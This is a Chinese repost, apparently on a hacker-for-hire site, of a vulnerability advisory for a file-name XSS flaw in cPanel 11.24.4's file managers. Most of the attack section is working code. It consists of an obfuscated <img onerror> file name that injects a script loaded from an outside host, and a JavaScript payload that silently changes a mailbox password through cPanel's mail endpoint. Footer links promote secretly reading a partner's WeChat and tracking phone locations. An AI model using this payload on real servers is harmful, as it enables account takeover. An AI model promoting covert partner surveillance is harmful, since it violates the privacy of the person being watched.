cPanel文件管理器文件名HTML注入漏洞

访客4年前关于黑客接单1343

影响版本:
cPanel 11.24.4-CURRENT
漏洞描述:
BUGTRAQ  ID: 34142

cPanel是基于web的工具,用于自动化控制网站和服务器。

Cpanel内嵌有两个文件管理器,分别为标准和旧式文件管理器。这两个文件管理器在处理文件名时存在跨站脚本漏洞,远程攻击者可以通过创建特制的文件名注入并执行脚本。

对于旧式文件管理器,只要查看了文件列表就可以执行攻击者的代码;对于标准文件管理器,文件列表经过转义,但如果用户对恶意文件执行了删除、拷贝、移动、重新命名等任务的话,仍可能执行注入的脚本。

由于文件名中禁用斜线字符,因此攻击者无法直接使用<script>标签加载脚本。为了摆脱这个限制,攻击者可以通过<img>标签onError属性注入脚本并将src属性设置为空字符串来强制触发出错事件。通过<img>标签注入的脚本生成<script>标签,使用document.write()函数执行外部脚本。 <*参考 
Rizki Wicaksono (rizki.wicaksono@gmail.com)
http://marc.info/?l=bugtraq&m=123730614528241&w=2.
*>
SEBUG安全建议:
厂商补丁:

cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cpanel.net.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
恶意文件名:

<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>

该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:

<script src=http://ilmuhacking.com/x.js></script>

PoC负载:

----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
    http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
    http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
    try {
       http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
    } catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
    result = http_request.responseText;
    alert(result);
} else {
    alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
                +
        \"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
        \"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);

 

标签: 好话题

相关文章

好评问答原创扶持计划_营业部

好评问答原创扶持计划,2018年11月15日推出,这套计划有效解决网站内容的原创性问题,并对作者的原创数量进行评估,让作者有更多的发展空间。好评原创扶持计划www.jcku.cn好评问答原创扶持计划,...

微信怎么同步聊天记录

很多人都想偷窥另一半的隐私,尤其是女性都是想看老公的微信,有没有跟其他的女孩子聊天或者玩暧昧。但是老公的手机除了在洗澡那一刹那会放在家里面,其他的时间都是随时携带的,想要看到微信了聊天内容非常的困难。...

如何同时接收老公微信_怎样同时接收老公的微信呢?这些方法很实用

生活中家庭需要信任,需要稳定,但是在某种特殊情况之下,就需要了解对方的行为,微信是一个比较大众化的社交软件,很多人的秘密都存在于微信当中。所以想知道对方的行为,就可以看一看对方的微信。如何同时接收老公...

黑客技术教程学习(成为黑客需要学什么)_黑客教程

黑客技术教程学习(成为黑客需要学什么),非常多人的影像是黑客需求用计算机写非常多繁杂的代码。因此,关于小白小白来说,毫无疑问,他会在迷雾中借鉴。因此此次我想跟朋友们共享一动手机的应用方法和黑客方法。并...

我要搜学网,银鹰第二幼儿园怎么样我要搜学网_智学网

建搜学搜课网 这样的网站大概需要多少钱? 要看你想做成什么样的,界面功能没什么要求的话,可以在网上下载开源程序搭建。 服务器肯定是需要的,但不用购买,直接租用就可以了,还需要域名。可以先从小站做...

黑客教你微信定位寻人 查对方手机位置_微信定位

帮助方法的图片位置: 世界很大,但也很危险。 当我们面对危险时,如果警察不能及时到达或站起来,我们就需要学会如何自救和帮助他人。 对于一个高级的死屋网络渗透测试,与朋友分享在头版如何使用照片,学...